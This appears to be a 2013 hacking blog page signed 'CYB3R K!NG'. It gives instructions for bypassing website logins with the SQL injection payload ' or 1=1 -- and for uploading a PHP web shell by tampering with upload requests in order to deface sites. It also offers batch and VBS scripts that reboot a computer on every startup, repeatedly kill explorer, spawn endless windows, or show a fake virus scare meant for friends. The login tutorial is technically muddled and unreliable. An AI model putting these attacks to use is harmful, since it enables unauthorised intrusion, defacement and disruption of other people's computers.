FAKE SMS SENDER


Send Fake SMS Any Name And Number TO Any Number ...

Thursday, 15 August 2013

How to Hack a Website with Basic HTML Coding

1 >>> Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.


2 >>> Right click anywhere on that error page =>> go to view source.


3 >>> There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")





4 >>> Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)





5 >>> Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> “there instead of "<_type=password>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )





6 >>> Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)





7 >>> Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.





8 >>> Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.



>>> CYB3R K!NG <<< 




Wednesday, 14 August 2013

How To Upload Your PHP Shell Through Tamper Data On Firefox Add-On Free 100% Working Trick

Upload Your PHP Shell Through Tamper Data




Hi Guys.Today i tell you How to upload php shell via using Temper Data.First i tell you what is Temper Data. we use Temper Data when we have access to the admin panel. Then we try to upload our shell but it doesn't allow it to upload the shell as extension .php or .asp Then we are not able to deface it. In that case we use Data Tampering to upload our shell and make it perfectly executable. By Data Tampering we can change the file extension by the Add on of the Firefox called ” Data Tamper ".Most website hackers use this tool For uploading shell.It's very simple and easy.


1. Download Mozilla Firefox  Firefox



2. Download Temper Data HERE


3. Now Install Temper Data and Restart Mozilla Firefox.

4. You have to rename your .php shell to .jpg to bypass the website's security
To upload a shell, of-course you needed a upload option in login page or anywhere !

5. Then login to the site where you want to upload shell.
Go to the place where you can upload the image. In my case it is in the product category>edit product.


6. Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window Like shown Below




Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

7. Now click on Browse > select your shell location ( Must be in .jpg, .png, .gif ) like anything.jpg before clicking the upload button open the Data Tamper and click on start tamper then click on upload the image. You will get the pop up click on Tamper.



8. After a click on "Temper" you will see "Tamper Popup"
                                                    In Tamper Popup Window, Copy "POST_DATA" text in Notepad



. After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php



10. Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & Deface This Site

CYB3R K!NG



Sunday, 11 August 2013

Best CMD Tricks


CMD is short for commander.


It is great for a lot of things and it's also very clean.

-----------------------------------------------------------------------------------------------
 Lets learn how to make the computer shut down everytime it's booted, shall we?
 -----------------------------------------------------------------------------------------------

First open CMD,

Next open notepad.

If you write "start shutdown -r" in CMD and press enter, your computer will restart. Also if you write the same in "run".
 (Change -r to -s to shutdown computer, or write -l to logg off.)

If you write
 ---------------------------------------
 @echo off

cls
 start shutdown -r

cls
 goto :a
 ---------------------------------------
 in notepad and save it as something.bat (bat is important) and then open it, your computer will restart in the same way.

So, lets get into autostart. Put that bat file in autostart (autostart can be found in start menu) and each time your
 computer is booted it will start that file and your computer will restart.
 If you write the next script your computer will try to shutdown several times at once. it will freak for about half a minute
 and then turn off.

Lets get a better understanding how scripts works. The above script shuts down your computer, but a bat file normaly opens
 CMD and does whatever you told it to do.

@echo off - This is where you put commands that shouldn't be shown as text. For example cls. You don't want that to be text,
 it's a command.

cls - This one is pretty good, it clears the text in the CMD screen

CMD - This command gives you a new CMD session.

start - this triggers stuff, in this case it's shutdown.

color - changes the colour in the cmd window, I recommend writing "color 0a", which is a green color thats really cool
 on a black window.

title - write "title something" to change title.

goto :a - This one is really, really, really, really cool. It's used for making loops and some more advanced stuff that I
 wont go into. Lets say you write
 --------------------------------------
 @echo off
 :a
 cls
 start shutdown -r

cls
 goto :a
 --------------------------------------

The goto :a tells you to go to :a higher up in the script. so it starts the script again, then it does the goto :a command
 again and the script reloads. Basicaly a loop. You can change the "a" to whatever you want, for example "error". This is
 only to make it easier for you to read your script.

The : infront of "a" must stay where it is.
 Bad example:
 goto: a

Good example:
 goto :a

--------------------------------------

dir - This shows you the files in the directory you are in.

dir /s - This shows you all the files on your computer.

echo - write "echo something" and it will be as a text in cmd.

echo. This is a linebrake.

cd - Write cd followed up with a location, to go there in cmd. For example "cd c:\windows".

cd .. - This goes back one step in the directory. For example if your in c:\windows and write "cd .." you go back to c:\.

So now you know the basics, which we'll use to make you computer do stuff. In cmd you can write "help" to get a list of most
 commands.

Moving away from learning commands now.

-----------------------------------------------------------------------------------------------
 Lets make a spamm script.
 -----------------------------------------------------------------------------------------------

---------------------------- -------------------
 @echo off
 cls
 :a
 start notepad.exe
 goto :a

-----------------------------------------------
 this script will continue to open notepad until you close cmd. Not recommended to run this on a slow computer.
 As we said before, "start" triggers things, this script triggers notepad and then the loop (goto :a) is triggered.

-----------------------------------------------------------------------------------------------
 Lets just mess around.
 -----------------------------------------------------------------------------------------------

---------------------------- -------------------
 @echo off
 cls
 :a
 taskkill /im explorer.exe /f
 goto :a
 -----------------------------------------------

This will close the bar where start menu and tasks are shown, for example if you open internet you will see it at the bottom
 of the screen on the explorer bar.
 Closing this will leave people with little things to do.

.. CYB3R K!NG ...

PC Off In 5 Mints

@echo off
 msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
 shutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

...save in notepad as a pcoff.bat and send to your friends ...

CYB3R K!NG

Best 5 Notepad Tricks .

1 Matrix Coding



Open Notepad > Paste the Following code > Save it as Matrix.bat

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks


2. Keyboard types Automatically 



Open Notepad > Paste the Following code > Replace "This is a Virus" with Any Text > Save it as Trick.VBS

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop









3. Continuously Eject CD/DVD Tray

Open Notepad > Paste the Following code > Save it as Eject.VBS

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop








4. Open Notepad Infinitely 

Open Notepad > Paste the Following Code > Save it as NP.Bat



@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top





5. Make your Computer Talks: BEST! 

Open Notepad > Paste the following code > Save it as Talk.VBS
Launch it > Put the text you want to talk > Click OK

Dim Message, Speak
Message=InputBox("Enter Text to Talk o","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message 



HOpe you enjoy !
keep visiting !

CYB3R K!NG